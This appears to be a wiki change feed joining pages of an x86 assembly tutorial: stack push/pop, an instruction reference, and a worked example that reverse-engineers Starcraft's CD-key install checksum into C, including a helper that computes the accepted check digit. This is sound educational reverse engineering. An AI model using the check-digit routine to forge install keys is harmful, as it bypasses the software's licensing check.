sub esp, 4<br />
mov [esp], ecx<br />
<br />
''pop'' sets the operand to the value on the stack, then increments the stack pointer by the size of the operand. This assembly:<br />
pop ecx<br />
Is functionally equivalent to:<br />
mov ecx, [esp]<br />
add esp, 4<br />
<br />
This will be examined in detail in the Stack section of this tutorial.<br />
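<br />
As a toy model, the same behaviour can be written in C with an array standing in for stack memory. Everything here (toy_stack, stack_init, toy_push, toy_pop) is invented for illustration, esp is counted in 4-byte slots rather than bytes, and there are no overflow or underflow checks. <br />

```c
#include <stdint.h>

#define STACK_WORDS 16

/* Hypothetical toy stack: esp is an index into memory, in 4-byte slots. */
typedef struct {
    uint32_t memory[STACK_WORDS];
    uint32_t esp;
} toy_stack;

/* An empty stack starts with esp just past the highest slot. */
void stack_init(toy_stack *stack)
{
    stack->esp = STACK_WORDS;
}

/* push: decrement the stack pointer first, then store the value. */
void toy_push(toy_stack *stack, uint32_t value)
{
    stack->esp -= 1;
    stack->memory[stack->esp] = value;
}

/* pop: load the value first, then increment the stack pointer. */
uint32_t toy_pop(toy_stack *stack)
{
    uint32_t value = stack->memory[stack->esp];
    stack->esp += 1;
    return value;
}
```

Pushing two values and popping them returns them in reverse order, and esp ends up back where it started. <br />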
<br />
=== pushaw, pushad, popaw, popad ===<br />
''pushaw'' and ''pushad'' save all 16-bit or 32-bit general-purpose registers (respectively) onto the stack. <br />
<br />
''popaw'' and ''popad'' restore all 16-bit or 32-bit general-purpose registers from the stack. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, and I will do my best to answer them; however, you may need to contact me to let me know that a question exists.<br />
<br />
Further explain bitwise<br />
<br />
In your example code:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 cmp ecx, 5<br />
50 jl 20<br />
Won't this just loop forever because ecx is never incremented? Total noob here so I may have missed something obvious.<br />
*** Yes, my mistake. <br />
<br />
Indeed, would not this be more accurate?:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
 50 cmp ecx, 5<br />
60 jl 20<br />
*** Changed. <br />
<br />
Also, the stack pointer is decremented when pushing, but incremented when popping? Isn't this counterintuitive?<br />
*** Yes, the stack starts high and grows downwards. Welcome to x86 assembler!</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Example_1&diff=3133Example 12012-01-14T05:23:48Z<p>Killboy: /* Reduced C Code */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
Welcome to the first assembly example! If you have read and understood all the sections up to here, there will not be any surprises. <br />
<br />
The code shown below verifies that a CDKey is valid to install the game with. If the CDKey fails to pass this check, the CDKey may not be used to install the game. Whether this succeeds or fails has no bearing on whether the CDKey is valid to log onto Battle.net with. <br />
<br />
The way one should approach this is to do the following:<br />
# Copy all the assembly code to your IDE or somewhere safe. <br />
# Go through each line, and make a note of what it does (typically, putting a ; at the end and adding a comment works well). Try and understand what the code is doing. <br />
# Go through each line, and convert it to the equivalent C code (or Java, if you're more comfortable with that). <br />
# Try and combine and reduce the code to make it as simple as possible. <br />
<br />
I'll go through those steps here, hopefully to give an idea of how to approach a function such as this. I highly recommend you try it yourself first, though. <br />
<br />
== Code ==<br />
<pre><br />
; Note: ecx is a pointer to a 13-digit Starcraft cdkey<br />
; This is a function that returns 1 if it's a valid key, or 0 if it's invalid<br />
mov eax, 3<br />
mov esi, ecx<br />
xor ecx, ecx<br />
Top:<br />
movsx edx, byte ptr [ecx+esi]<br />
sub edx, 30h<br />
lea edi, [eax+eax]<br />
xor edx, edi<br />
add eax, edx<br />
inc ecx<br />
cmp ecx, 0Ch<br />
jl short Top<br />
<br />
xor edx, edx<br />
mov ecx, 0Ah<br />
div ecx<br />
<br />
movsx eax, byte ptr [esi+0Ch]<br />
add edx, 30h<br />
cmp eax, edx<br />
jnz bottom<br />
<br />
mov eax, 1<br />
ret<br />
<br />
bottom:<br />
xor eax, eax<br />
ret<br />
</pre><br />
<br />
== Annotated Code ==<br />
Please, try this yourself first! <br />
<br />
I've been over this code a dozen times, so I know it very well. I've tried to annotate it as clearly as possible. <br />
<br />
<pre><br />
; Note: ecx is a pointer to a 13-digit Starcraft cdkey<br />
; This is a function that returns 1 if it's a valid key, or 0 if it's invalid<br />
mov eax, 3 ; Set eax to 3<br />
mov esi, ecx ; Move the cdkey pointer to esi. It'll likely stay there, since esi is non-volatile<br />
xor ecx, ecx ; Clear ecx. Since a loop is coming up, this might be a loop counter<br />
Top:<br />
 movsx edx, byte ptr [ecx+esi] ; ecx is a loop counter, and esi is the cdkey. This takes the ecx'th<br />
; character (dereferenced, because of the square brackets [ ]) and moves<br />
; it into edx. Since it's a character array (string), there is no multiplier<br />
; for the array index. <br />
<br />
sub edx, 30h ; Subtract 0x30 from the character. This converts the ascii character '0', <br />
; '1', '2', etc. to the integer 0, 1, 2, etc.<br />
 lea edi, [eax+eax] ; Store double eax in edi. eax is likely an accumulator, which stores a result. <br />
 xor edx, edi ; Xor the current digit with the doubled checksum.<br />
 add eax, edx ; Add the result of the xor (edx) into the checksum (eax).<br />
inc ecx ; Increment the loop counter, ecx.<br />
cmp ecx, 0Ch ; Compare the loop counter to 0x0c, or 12. <br />
 jl short Top ; Go back to the top until the 12th character (note that the last character<br />
 ; is skipped)<br />
<br />
xor edx, edx ; Clear edx<br />
 mov ecx, 0Ah ; Set ecx to 0x0a (10)<br />
div ecx ; Remember division? edx is cleared above, so this basically does eax / ecx<br />
; We don't know yet whether it will use the quotient (eax) or remainder (edx)<br />
<br />
movsx eax, byte ptr [esi+0Ch] ; Move the last character in the cdkey to eax. Note that this used move with <br />
; sign extension, which means the character is signed. Because it's an ascii <br />
; number (between 0x30 and 0x39), it'll never be negative so this doesn't<br />
; matter. <br />
add edx, 30h ; Convert edx (which is the remainder from the division -- the checksum % 10)<br />
; back to an ascii character. From the integer 0, 1, 2, etc. to the characters<br />
; '0', '1', '2', etc.<br />
<br />
cmp eax, edx ; Compare the last digit of the cdkey to the checksum result. <br />
jnz bottom ; If they aren't equal, jump to the bottom, which returns 0<br />
<br />
mov eax, 1 ; Return 1<br />
ret<br />
<br />
bottom:<br />
xor eax, eax ; Clear eax, and return 0<br />
ret<br />
</pre><br />
<br />
== C Code ==<br />
Please, try this yourself first! <br />
<br />
This is an absolutely direct conversion from the annotated assembly to C. I added a main function that sends a bunch of test keys through the function to print out the results. <br />
<br />
Now that a driver function can test the CDKey validator, the code can be reduced and condensed. <br />
<br />
<pre><br />
#include <stdio.h><br />
<br />
/* Prototype */<br />
int checkCDKey(char *key);<br />
<br />
int main(int argc, char *argv[])<br />
{<br />
/* A series of test cases (I'm using fake keys here obviously, but real ones work even better) */<br />
char *keys[] = { "1212121212121", /* Valid */<br />
"3781030596831", /* Invalid */<br />
"3748596030203", /* Invalid */<br />
"1234567890123", /* Valid */<br />
"4962883551538", /* Valid */<br />
"0000000000000", /* Invalid */<br />
"1111111111111", /* Invalid */<br />
"2222222222222", /* Invalid */<br />
"3333333333333", /* Valid */<br />
"4444444444444", /* Invalid */<br />
"5555555555555", /* Invalid */<br />
"6666666666666", /* Invalid */<br />
"7777777777777", /* Invalid */<br />
"8888888888888", /* Invalid */<br />
"9999999999999" /* Invalid */<br />
};<br />
int valid[] = { 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0 };<br />
int i;<br />
<br />
for(i = 0; i < 15; i++)<br />
printf("%s: %d == %d\n", keys[i], valid[i], checkCDKey(keys[i]));<br />
<br />
return 0;<br />
}<br />
<br />
int checkCDKey(char *key)<br />
{<br />
int eax, ebx, ecx, edx, edi;<br />
char *esi;<br />
<br />
// This is C code, written and tested with the gcc compiler, under Linux. However, this should universally work. <br />
// ; Note: ecx is a pointer to a 13-digit Starcraft cdkey<br />
// ; This is a function that returns 1 if it's a valid key, or 0 if it's invalid<br />
// mov eax, 3 ; Set eax to 3<br />
eax = 3;<br />
// mov esi, ecx ; Move the cdkey pointer to esi. It'll likely stay there, since esi is non-volatile<br />
esi = key;<br />
// xor ecx, ecx ; Clear ecx. Since a loop is coming up, this might be a loop counter<br />
ecx = 0;<br />
// Top:<br />
do<br />
{<br />
// movsx edx, byte ptr [ecx+esi] ; ecx is a loop counter, and esi is the cdkey. This takes the ecx'th<br />
// ; character (dereferenced, because of the square brackets [ ]) and moves<br />
// ; it into edx. Since it's a character array (string), there is no multiplier<br />
// ; for the array index. <br />
edx = *(ecx + esi);<br />
//<br />
// sub edx, 30h ; Subtract 0x30 from the character. This converts the ascii character '0', <br />
// ; '1', '2', etc. to the integer 0, 1, 2, etc.<br />
edx = edx - 0x30;<br />
// lea edi, [eax+eax] ; Store double eax in edi. eax is likely an accumulator, which stores a result. <br />
edi = eax + eax;<br />
// xor edx, edi ; Xor the current digit with the doubled checksum.<br />
edx = edx ^ edi;<br />
// add eax, edx ; Add the result of the xor (edx) into the checksum (eax).<br />
eax = eax + edx;<br />
// inc ecx ; Increment the loop counter, ecx.<br />
ecx++;<br />
// cmp ecx, 0Ch ; Compare the loop counter to 0x0c, or 12. <br />
// jl short Top ; Go back to the top until the 12th character (note that the last character<br />
}<br />
while(ecx < 0x0c);<br />
// ; is skipped<br />
//<br />
// xor edx, edx ; Clear edx<br />
edx = 0;<br />
// mov ecx, 0Ah ; Set ecx to 0x0a (10)<br />
ecx = 0x0a;<br />
// div ecx ; Remember division? edx is cleared above, so this basically does eax / ecx<br />
// ; We don't know yet whether it will use the quotient (eax) or remainder (edx)<br />
edx = eax % ecx;<br />
//<br />
// movsx eax, byte ptr [esi+0Ch] ; Move the last character in the cdkey to eax. Note that this used move with <br />
// ; sign extension, which means the character is signed. Because it's an ascii <br />
// ; number (between 0x30 and 0x39), it'll never be negative so this doesn't<br />
// ; matter. <br />
eax = *(esi + 0x0c);<br />
// add edx, 30h ; Convert edx (which is the remainder from the division -- the checksum % 10)<br />
// ; back to an ascii character. From the integer 0, 1, 2, etc. to the characters<br />
// ; '0', '1', '2', etc.<br />
edx = edx + 0x30;<br />
//<br />
// cmp eax, edx ; Compare the last digit of the cdkey to the checksum result. <br />
if(eax == edx)<br />
{<br />
// jnz bottom ; If they aren't equal, jump to the bottom, which returns 0<br />
//<br />
// mov eax, 1 ; Return 1<br />
// ret<br />
return 1;<br />
}<br />
else<br />
{<br />
//<br />
// bottom:<br />
// xor eax, eax ; Clear eax, and return 0<br />
// ret<br />
return 0;<br />
}<br />
}<br />
</pre><br />
<br />
Here is the output:<br />
<pre><br />
1212121212121: 1 == 1<br />
3781030596831: 0 == 0<br />
3748596030203: 0 == 0<br />
1234567890123: 1 == 1<br />
4962883551538: 1 == 1<br />
0000000000000: 0 == 0<br />
1111111111111: 0 == 0<br />
2222222222222: 0 == 0<br />
3333333333333: 1 == 1<br />
4444444444444: 0 == 0<br />
5555555555555: 0 == 0<br />
6666666666666: 0 == 0<br />
7777777777777: 0 == 0<br />
8888888888888: 0 == 0<br />
9999999999999: 0 == 0<br />
</pre><br />
<br />
== Cleaned up C Code == <br />
Here's the same code with the assembly removed and some minor cleanups. After every change, the program should be run again to ensure that the code still works as expected. The driver function is unchanged, so here's the cleaned up C function:<br />
<br />
<pre><br />
int checkCDKey(char *key)<br />
{ <br />
int eax, ebx, ecx, edx, edi; <br />
char *esi;<br />
<br />
eax = 3;<br />
esi = key;<br />
ecx = 0;<br />
<br />
do<br />
{<br />
edx = *(ecx + esi);<br />
edx = edx - 0x30;<br />
edi = eax + eax;<br />
edx = edx ^ edi;<br />
eax = eax + edx;<br />
ecx++;<br />
}<br />
while(ecx < 0x0c);<br />
<br />
edx = 0;<br />
ecx = 0x0a;<br />
edx = eax % ecx;<br />
eax = *(esi + 0x0c);<br />
edx = edx + 0x30;<br />
if(eax == edx)<br />
return 1;<br />
else<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Reduced C Code ==<br />
In this section the code will be reduced and cleaned up to be as friendly as possible. Technically, the above function can be left the way it is, but it's a good exercise to learn. <br />
<br />
First, the variables are renamed, unused variables are removed, and the return is condensed:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp, temp2; <br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
do<br />
{<br />
temp = *(i + key);<br />
temp = temp - 0x30;<br />
temp2 = accum + accum;<br />
temp = temp ^ temp2;<br />
accum = accum + temp;<br />
i++;<br />
}<br />
while(i < 0x0c);<br />
<br />
temp = 0;<br />
i = 0x0a;<br />
temp = accum % i;<br />
accum = *(key + 0x0c);<br />
temp = temp + 0x30;<br />
<br />
return accum == temp;<br />
}<br />
</pre><br />
<br />
Replace the pointers with array indexing, which looks a lot nicer:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp, temp2; <br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
do<br />
{<br />
temp = key[i];<br />
temp = temp - 0x30;<br />
temp2 = accum + accum;<br />
temp = temp ^ temp2;<br />
accum = accum + temp;<br />
i++;<br />
}<br />
while(i < 0x0c);<br />
<br />
temp = 0;<br />
i = 0x0a;<br />
temp = accum % i;<br />
accum = key[12];<br />
temp = temp + 0x30;<br />
<br />
return accum == temp;<br />
}<br />
</pre><br />
<br />
Substitute some variables with their values:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp, temp2; <br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
do<br />
{<br />
temp = key[i] - 0x30;<br />
temp = temp ^ (accum + accum);<br />
accum = accum + temp;<br />
i++;<br />
}<br />
while(i < 0x0c);<br />
<br />
temp = (accum % 10) + 0x30;<br />
accum = key[12];<br />
<br />
return accum == temp;<br />
}<br />
</pre><br />
<br />
Substitute some more variables, and replace the do..while loop with a for loop:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp;<br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
for(i = 0; i < 12; i++)<br />
{<br />
temp = (key[i] - 0x30) ^ (accum + accum);<br />
accum = accum + temp;<br />
}<br />
<br />
<br />
return key[12] == ((accum % 10) + 0x30);<br />
}<br />
</pre><br />
<br />
== Finished Code ==<br />
And finally, substitute the last of the variables:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
<br />
for(i = 0; i < 12; i++)<br />
accum += (key[i] - 0x30) ^ (accum + accum);<br />
<br />
return key[12] == ((accum % 10) + 0x30);<br />
}<br />
</pre><br />
<br />
That's as reduced as it gets. And running it through the driver function still works. <br />
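<br />
One way to double-check the reduced function is to turn it around and compute the digit that the check expects. The helper below is not part of the original game code; computeCheckDigit is a hypothetical name, and the function simply reuses the loop from the finished code on the first 12 characters, which are assumed to be ASCII digits. <br />

```c
/* Hypothetical helper: returns the 13th character that checkCDKey would accept
 * for the given first 12 digits. Assumes all 12 characters are '0'..'9'. */
char computeCheckDigit(const char *first12)
{
    int accum = 3;
    int i;

    /* Same accumulation as in checkCDKey. */
    for(i = 0; i < 12; i++)
        accum += (first12[i] - '0') ^ (accum + accum);

    /* The checksum modulo 10, converted back to an ASCII digit. */
    return (char)((accum % 10) + '0');
}
```

For the first 12 digits of the test key 1212121212121 this returns '1', and for 333333333333 it returns '3', which agrees with both keys being reported as valid by the driver. <br />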
<br />
That's all for example 1. The next example will demonstrate the way in which the Starcraft CDKey is shuffled before it is encoded.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Simple_Instructions&diff=3132Simple Instructions2012-01-14T05:19:44Z<p>Killboy: /* shl, shr, sal, sar */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section will go over some basic assembly instructions that you will likely see frequently. Some of the instructions shown here are tricky, and some have special properties (such as the registers they use). Additionally, x86 assembly is comprised of hundreds of different instructions. As a result, you will likely want to find a complete reference book or website to have alongside you. This page, however, will give enough of an introduction to get you started. <br />
<br />
== Pointers and Dereferencing==<br />
First, we will start with the hard stuff. If you understood the pointers section, this shouldn't be too bad. If you didn't, you should probably go back and refresh your memory. <br />
<br />
Recall that a pointer is a data type that stores an address as its value. Since registers are simply 32-bit values with no actual types, any register may or may not be a pointer, depending on what is stored. It is the responsibility of the program to treat pointers as pointers and to treat non-pointers as non-pointers. <br />
<br />
If a value is a pointer, it can be dereferenced. Recall that dereferencing a pointer retrieves the value stored at the address being pointed to. In assembly, this is generally done by putting square brackets ("[" and "]") around the register. For example:<br />
* eax -- is the value stored in eax<br />
* [eax] -- is the value pointed to by eax<br />
This will be thoroughly discussed in upcoming sections.<br />
<br />
== Doing Nothing ==<br />
The ''nop'' instruction is probably the simplest instruction in assembly. nop is short for "no operation" and it does nothing. This instruction is used for padding. <br />
<br />
== Moving Data Around ==<br />
The instructions in this section deal with relocating numbers and pointers. <br />
<br />
=== mov, movsx, movzx ===<br />
''mov'' is the instruction used for assignment, analogous to the "=" sign in most languages. mov can move data between a register and memory, between two registers, or from a constant to a register or memory. Here are some examples:<br />
mov eax, 1 ; set eax to 1 (eax = 1)<br />
mov edx, ecx ; set edx to whatever ecx is (edx = ecx)<br />
mov eax, 18h ; set eax to 0x18<br />
mov eax, [ebx] ; set eax to the value in memory that ebx is pointing at<br />
 mov dword ptr [ebx], 3 ; move the 32-bit number 3 into the memory address that ebx is pointing at<br />
<br />
''movsx'' and ''movzx'' are special versions of mov which copy a signed (movsx) or unsigned (movzx) value from a smaller register or memory location into a bigger register. <br />
<br />
''movsx'' means ''move with sign extension''. The data is moved from a smaller register into a bigger register, and the sign is preserved by either padding with 0's (for positive values) or F's (for negative values). Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000''', since it was positive<br />
* '''0x7FFF''' becomes '''0x00007FFF''', since it was positive<br />
* '''0xFFFF''' becomes '''0xFFFFFFFF''', since it was negative (note that 0xFFFF is -1 in 16-bit signed, and 0xFFFFFFFF is -1 in 32-bit signed)<br />
* '''0x8000''' becomes '''0xFFFF8000''', since it was negative (note that 0x8000 is -32768 in 16-bit signed, and 0xFFFF8000 is -32768 in 32-bit signed)<br />
<br />
''movzx'' means ''move with zero extension''. The data is moved from a smaller register into a bigger register, and the sign is ignored. Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000'''<br />
* '''0x7FFF''' becomes '''0x00007FFF'''<br />
* '''0xFFFF''' becomes '''0x0000FFFF'''<br />
* '''0x8000''' becomes '''0x00008000'''<br />
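<br />
The two extensions can be sketched in C as follows. The function names ''movsx16'' and ''movzx16'' are hypothetical; they model extending a 16-bit value to 32 bits. <br />

```c
#include <stdint.h>

/* Models "movsx eax, ax": pad with F's if the sign bit (bit 15) is set,
   otherwise pad with 0's. */
uint32_t movsx16(uint16_t ax)
{
    uint32_t upper = (ax & 0x8000u) ? 0xFFFF0000u : 0x00000000u;
    return upper | ax;
}

/* Models "movzx eax, ax": the upper 16 bits are always zero. */
uint32_t movzx16(uint16_t ax)
{
    return (uint32_t)ax;
}
```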
<br />
=== lea ===<br />
''lea'' (load effective address) is very similar to mov, except that math can be done on the original value before it is stored. The "[" and "]" characters always surround the second parameter, but in this case they ''do not indicate dereferencing''; it is easiest to think of them as just being part of the formula. <br />
<br />
lea is generally used for calculating array offsets, since the address of an element of the array can be found with [arraystart + offset*datasize]. lea can also be used for quickly doing math, often with an addition and a multiplication. Examples of both uses are below. <br />
<br />
Here are some examples of using lea:<br />
lea eax, [eax+eax] ; Double the value of eax -- eax = eax * 2<br />
lea edi, [esi+0Bh] ; Add 11 to esi and store the result in edi<br />
lea eax, [esi+ecx*4] ; This is generally used for indexing an array of integers. esi is a <br />
pointer to the beginning of an array, and ecx is the index of the <br />
element that is to be retrieved. The index is multiplied by 4 <br />
because Integers are 4 bytes long. eax will end up storing the <br />
address of the ecx'th element of the array. <br />
<br />
lea edi, [eax+eax*2] ; Triple the value of eax and store the result in edi -- edi = eax * 3<br />
lea edi, [eax+ebx*2] ; This likely indicates that eax points to an array of 16-bit (2 byte) <br />
values, and that ebx is an index into it. Note the similarities <br />
between this and the previous example: the same kind of math is being done, <br />
but for a different reason. <br />
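<br />
The formula that lea evaluates can be modelled in C like this. It is a sketch under the assumption of 32-bit registers; the function name ''lea'' and its parameter names are illustrative only. <br />

```c
#include <stdint.h>

/* Models "lea dst, [base + index*scale + disp]".
   Only arithmetic is performed; no memory is read. */
uint32_t lea(uint32_t base, uint32_t index, uint32_t scale, uint32_t disp)
{
    return base + index * scale + disp;
}
```

For example, lea(0x1000, 3, 4, 0) gives 0x100C, the address of element 3 in an array of 4-byte integers that starts at 0x1000. <br />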
<br />
== Math and Logic ==<br />
The instructions in this section deal with math and logic. Some are simple, and others (such as multiplication and division) are pretty tricky. <br />
<br />
=== add, sub ===<br />
A register can have another register, a constant value, or a value read from memory added to or subtracted from it. The syntax of addition and subtraction is fairly simple:<br />
add eax, 3 ; Adds 3 to eax -- eax = eax + 3<br />
add ebx, eax ; Adds the value of eax to ebx -- ebx = ebx + eax<br />
sub ecx, 3 ; Subtracts 3 from ecx -- ecx = ecx - 3<br />
<br />
=== inc, dec ===<br />
These instructions simply increment and decrement a register. <br />
inc eax ; eax++<br />
dec ecx ; ecx--<br />
<br />
=== and, or, xor, not, neg ===<br />
All logical instructions are bitwise. If you don't know what "bitwise arithmetic" means, you should probably look it up. The simplest way of thinking of this is that the operation is performed between each pair of corresponding bits in the two operands, and the result is stored in the first operand. <br />
<br />
The instructions are pretty self-explanatory: and does a bitwise 'and', or does a bitwise 'or', xor does a bitwise 'xor', and not does a bitwise negation (it inverts every bit). ''neg'' is the odd one out: it is an arithmetic instruction that computes the two's-complement negative of its operand (0 minus the value), not a bitwise inversion.<br />
<br />
Here are some examples:<br />
and eax, 7 ; eax = eax & 7 -- because 7 is 000..000111, this clears all bits <br />
except for the last three. <br />
or eax, 16 ; eax = eax | 16 -- because 16 is 000..00010000, this sets the 5th <br />
bit from the right to "1". <br />
xor eax, 1 ; eax = eax ^ 1 -- this toggles the right-most bit in eax, 0=>1 or <br />
1=>0.<br />
xor eax, 0FFFFFFFFh ; eax = eax ^ 0xFFFFFFFF -- this toggles every bit in eax, which is <br />
identical to a bitwise negation.<br />
not eax ; eax = ~eax -- inverts every bit in eax, same as the previous.<br />
neg eax ; eax = -eax -- two's-complement negation, equivalent to (~eax) + 1.<br />
xor eax, eax ; eax = 0 -- this clears eax quickly, and is extremely <br />
common.<br />
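<br />
The same masks can be tried out in C, whose &, | and ^ operators map directly onto these instructions. This is a small sketch; the function names are made up for illustration. <br />

```c
#include <stdint.h>

uint32_t keep_low3(uint32_t eax)   { return eax & 7u; }          /* and eax, 7  */
uint32_t set_bit4(uint32_t eax)    { return eax | 16u; }         /* or  eax, 16 */
uint32_t toggle_bit0(uint32_t eax) { return eax ^ 1u; }          /* xor eax, 1  */
uint32_t invert_all(uint32_t eax)  { return eax ^ 0xFFFFFFFFu; } /* same as ~eax */
uint32_t clear(uint32_t eax)       { return eax ^ eax; }         /* xor eax, eax */
```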
<br />
=== mul, imul, div, idiv, cdq ===<br />
Multiplication and division are the trickiest operations commonly used, because of how they deal with overflow issues. Both multiplication and division make use of the register pair edx:eax, which is treated as a single 64-bit value with the high 32 bits in edx and the low 32 bits in eax. <br />
<br />
''mul'' multiplies the unsigned value in eax with the operand, and stores the 64-bit result in edx:eax. ''imul'' does the same thing, except the values are treated as signed. Here are some examples:<br />
mul ecx ; edx:eax = eax * ecx (unsigned)<br />
imul edx ; edx:eax = eax * edx (signed)<br />
<br />
''imul'' (but not ''mul'') also has forms that take two or three operands. These multiply the operands as expected, but keep only the low 32 bits of the result:<br />
imul ecx, edx ; ecx = ecx * edx<br />
imul ecx, 20h ; ecx = ecx * 0x20<br />
imul ecx, edx, 20h ; ecx = edx * 0x20<br />
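<br />
To see how a 64-bit product is split across edx and eax, here is a sketch in C of the one-operand forms. The struct ''edx_eax'' and the function names ''mul32'' and ''imul32'' are hypothetical. <br />

```c
#include <stdint.h>

/* Holds the two halves of the edx:eax pair. */
struct edx_eax { uint32_t edx; uint32_t eax; };

/* Models one-operand "mul": unsigned 32x32 -> 64-bit product. */
struct edx_eax mul32(uint32_t eax, uint32_t operand)
{
    uint64_t product = (uint64_t)eax * operand;
    struct edx_eax r;
    r.edx = (uint32_t)(product >> 32);  /* high 32 bits */
    r.eax = (uint32_t)product;          /* low 32 bits  */
    return r;
}

/* Models one-operand "imul": signed 32x32 -> 64-bit product. */
struct edx_eax imul32(int32_t eax, int32_t operand)
{
    int64_t product = (int64_t)eax * operand;
    uint64_t bits = (uint64_t)product;  /* reinterpret as raw bits */
    struct edx_eax r;
    r.edx = (uint32_t)(bits >> 32);
    r.eax = (uint32_t)bits;
    return r;
}
```

Multiplying 0xFFFFFFFF by 2 shows the difference: unsigned, it is a large number whose product spills one bit into edx; signed, it is -1, and the product -2 fills edx with F's. <br />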
<br />
''div'' divides the 64-bit value in edx:eax by the operand, and stores the quotient in eax. The remainder (modulus) is stored in edx. In other words, div does both division and modular division, at the same time. Typically, a program will only use one or the other, so you will have to check which instructions follow to see whether eax or edx is saved. Here are some examples:<br />
div ecx ; eax = edx:eax / ecx (unsigned)<br />
; edx = edx:eax % ecx (unsigned)<br />
<br />
idiv ecx ; eax = edx:eax / ecx (signed)<br />
; edx = edx:eax % ecx (signed)<br />
<br />
''cdq'' is generally used immediately before idiv. It stands for "convert doubleword to quadword." In other words, it converts the 32-bit value in eax to the 64-bit value in edx:eax, overwriting anything in edx with either 0's (if eax is zero or positive) or F's (if eax is negative). This is very similar to movsx, above. <br />
<br />
''xor edx, edx'' is generally used immediately before div. It clears edx to ensure that no leftover data is divided. <br />
<br />
Here is a common use of cdq and idiv:<br />
mov eax, 1007 ; 1007 will be divided<br />
mov ecx, 10 ; .. by 10<br />
cdq ; extends eax into edx<br />
idiv ecx ; eax will be 1007/10 = 100, and edx will be 1007%10 = 7<br />
<br />
Here is a common use of xor and div (the results are the same as the previous example):<br />
mov eax, 1007<br />
mov ecx, 10<br />
xor edx, edx<br />
div ecx<br />
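<br />
Both division idioms can be modelled in C. This is a sketch only: the struct ''quot_rem'' and the function names are made up, the divisor is assumed to be non-zero, and the signed version assumes the quotient fits in 32 bits (on a real CPU those cases raise a divide error). <br />

```c
#include <stdint.h>

/* eax receives the quotient, edx the remainder. */
struct quot_rem { uint32_t eax; uint32_t edx; };

/* Models "xor edx, edx" followed by "div operand". */
struct quot_rem div32(uint32_t eax, uint32_t operand)
{
    uint64_t dividend = (uint64_t)eax;   /* edx is 0, so edx:eax == eax */
    struct quot_rem r;
    r.eax = (uint32_t)(dividend / operand);
    r.edx = (uint32_t)(dividend % operand);
    return r;
}

/* Models "cdq" followed by "idiv operand". */
struct quot_rem idiv32(int32_t eax, int32_t operand)
{
    int64_t dividend = (int64_t)eax;     /* cdq: sign-extend eax into edx:eax */
    struct quot_rem r;
    r.eax = (uint32_t)(int32_t)(dividend / operand);
    r.edx = (uint32_t)(int32_t)(dividend % operand);
    return r;
}
```

Like idiv, C's / and % truncate toward zero, so dividing -1007 by 10 gives a quotient of -100 and a remainder of -7. <br />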
<br />
== shl, shr, sal, sar ==<br />
shl - shift left, shr - shift right.<br />
<br />
sal - shift arithmetic left, sar - shift arithmetic right.<br />
<br />
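These are used to do a binary shift, equivalent to the C operations << and >>. shr is a logical shift that fills the vacated high bits with zeros, so it is used for unsigned values; sar fills them with copies of the sign bit, so it is used for signed values. shl and sal are two names for the same instruction.<br />
They each take two operands: the register to use, and the number of places to shift the value in the register. As computers operate in base 2, these commands can be used as a faster replacement for multiplication/division operations involving powers of 2.<br />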
<br />
Divide by 2 (unsigned):<br />
mov eax, 16 ; eax = 16<br />
shr eax, 1 ; eax = 8<br />
<br />
Multiply by 4 (signed):<br />
mov eax, 5 ; eax = 5<br />
sal eax, 2 ; eax = 20<br />
<br />
Visualising the bits moving:<br />
mov eax, 7 ; = 0000 0111 (7)<br />
shl eax, 1 ; = 0000 1110 (14)<br />
shl eax, 2 ; = 0011 1000 (56)<br />
shr eax, 1 ; = 0001 1100 (28)<br />
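<br />
The two right shifts only differ when the highest bit is set. Here is a sketch in C, assuming 32-bit registers and a shift count from 0 to 31; the function names ''shr32'' and ''sar32'' are illustrative. <br />

```c
#include <stdint.h>

/* Models "shr eax, count": vacated high bits are filled with zeros. */
uint32_t shr32(uint32_t eax, unsigned count)
{
    return eax >> count;
}

/* Models "sar eax, count": vacated high bits are filled with the sign bit. */
uint32_t sar32(uint32_t eax, unsigned count)
{
    uint32_t shifted = eax >> count;
    if ((eax & 0x80000000u) && count > 0)
        shifted |= ~(0xFFFFFFFFu >> count);  /* set the top `count` bits */
    return shifted;
}
```

With eax = 0xFFFFFFF0 (-16 when signed), shifting right by 2 gives 0x3FFFFFFC with shr but 0xFFFFFFFC (-4) with sar. <br />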
<br />
== Jumping Around ==<br />
Instructions in this section are used to compare values and to make jumps. These jumps are used for calls, if statements, and every type of loop. The operand for most jump instructions is the address to jump to. <br />
<br />
=== jmp ===<br />
''jmp'', or jump, sends the program execution to the specified address no matter what. Here is an example:<br />
jmp 1400h ; jump to the address 0x1400<br />
<br />
=== call, ret ===<br />
''call'' is similar to jump, except that in addition to sending the program to the specified address, it also saves ("pushes") the address of the instruction immediately following the call (the return address) onto the stack. This will be explained more in a later section. <br />
<br />
''ret'' removes ("pops") the value on top of the stack, and jumps to it. In almost all cases, this value was placed onto the stack by the call instruction. If the stack pointer is at the wrong location, or the saved address was overwritten, ret jumps to whatever address it finds there. If that address is invalid, the program crashes immediately; otherwise it continues executing at the wrong place, where it will almost inevitably crash. <br />
<br />
